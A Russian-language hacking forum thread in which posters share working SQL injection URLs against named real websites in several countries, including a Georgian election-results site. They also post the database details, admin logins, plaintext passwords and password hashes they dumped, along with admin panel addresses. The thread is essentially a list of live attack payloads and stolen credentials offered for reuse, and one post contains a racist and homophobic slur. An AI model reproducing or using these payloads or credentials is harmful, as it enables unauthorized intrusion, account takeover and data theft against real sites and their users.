SQL Инъекции

http://www.trekkingclub.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/*
http://www.trekkingclub.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/*

VERSION:4.1.22
USER:tclub@localhost
DATABASE:tclub

 

gtr-gifts.com

Code:

http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat_ws(0x3,version(),user(),database()),2,3,4/*

5.0.45-community-ntimanez_gtr@localhostimanez_gtr

Code:

http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat(user_name,0x3,user_password),2,3,4+from+gtr_admin+limit+0,1/*

waynecarling

 

http://www.pride.ua/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+ibf_members+limit+0,10/*

Что-то не брутятся хеши. Mb дабл md5? .....

 

http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,2/*
http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,database()/*

VERSION: 4.1.20-log
USER: poni@localhost
DATABASE: poni

http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,2/**/from/**/data/*

 

http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from+users+limit+0,10/*


Жесть! login: admin Password: admin - ЛОЛ! ЛОЛ! ЛОЛ! Админа в жертву неграм-гомосексуалистим!!!!

 

http://www.pc-olymp.ru/admin/ - стандартно

 

http://www.gorobzor.ru/articles/view?id=1+union+select+concat(username,0x3a3a,user_password,0x3a3a)+from+forum.users+limit+1,10/*

Login Goodman
Pass: $H$9j04UOE51YElZky1aSdrq8t8ekKETZ/

Черти, потрудились бы грамотно фреймворк изучить...

 

www.accuratelimited.com

Code:

http://www.accuratelimited.com/entry_detail.php?entry_id=-1+union+select+1,2,3,concat_ws(0x3a,id,user_login,user_pass)+from+wp_users&entry_type=insight

www.airquality.co.uk

Code:

http://www.airquality.co.uk/archive/laqm/laqm.php?action=submit&map_name=wmid&la_id=-1+union+select+concat_ws(0x3a,user,password),2,3,4+from+mysql.user  

www.hanwha.com.tw

Code:

http://www.hanwha.com.tw/hardware_detail.php?hard_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database()),6,7,8,9,10,11,12,13,14,15

 

Автор строк, почему бы не объеденить сообщения в одно, а не постить по 15 раз подряд?

http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,2/*&lang=lv
http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,database()/*&lang=lv
http://www.i-veikals.lv/lapa=prod&group=1+union+select+1,table_name/**/from/**/
information_schema.tables/*&lang=lv

VERSION: 5.0.22
USER: [email protected]
DATABASE: pplhlv_proj

http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/*
http://www.belarus.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/*
http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/**/from/**/news/*

VERSION:4.1.22
USER:brlarusbase@localhost
DATABASE:belarusbase

 

Зы

Дык походу дела как ломал - так и постил)

 

Code:

http://junior.eurovision-georgia.ge/index.php?lang=eng&topid=3&id=-1+union+select+1,2,3,4,5/*

Code:

http://imi.ge/index.php?page=movie&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

Code:

http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,4,5,6/*

 

moh:de8d1369b56cd8193ee55d4a8532184c:1

HTML:

http://www.molhsa.ge/phpmyadmin/

 

http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+information_schema.tables--

user: presa_ge@localhost
dbname: presa_ge
version: 5.0.51

http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,concat_ws(0x3a,id,user_username,user_password,user_group),4,5,6+from+users+--

44resa.ge:c1ab283404b71a940807009023a764bd:1

P.S.
Админку найти не могу..

 

Qwazar,сорри,я просто,не увидел,Что ты хэшик вытащил...АА...я первее хэш вытащил))

TAbles:

presa.ge:c1ab283404b71a940807009023a764bd:[email protected]
******************************************
abs-tech.com

http://www.abs-tech.com/admin/
login:w3
password:radium123
Но я там оказался не одним из первых:

 

Code:

_http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13/*

смело ковыряем)

 

Code:

http://www.hereandnow.ru/index.php?ids=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7%20LIMIT%201,1/*

 

много таблиу от PhpBB ,но нету доступа к таблицы phpbb_users

 

Code:

http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,user_id,6,7,8,9,10,11,12,13+from+forum.phpbb_users/*

Как выяснилось позже..это приватный форум
forum.
sanet
.ge
туда доступа нету(

 

Code:

http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=@@version--

в MSSQL Не силён((

 

///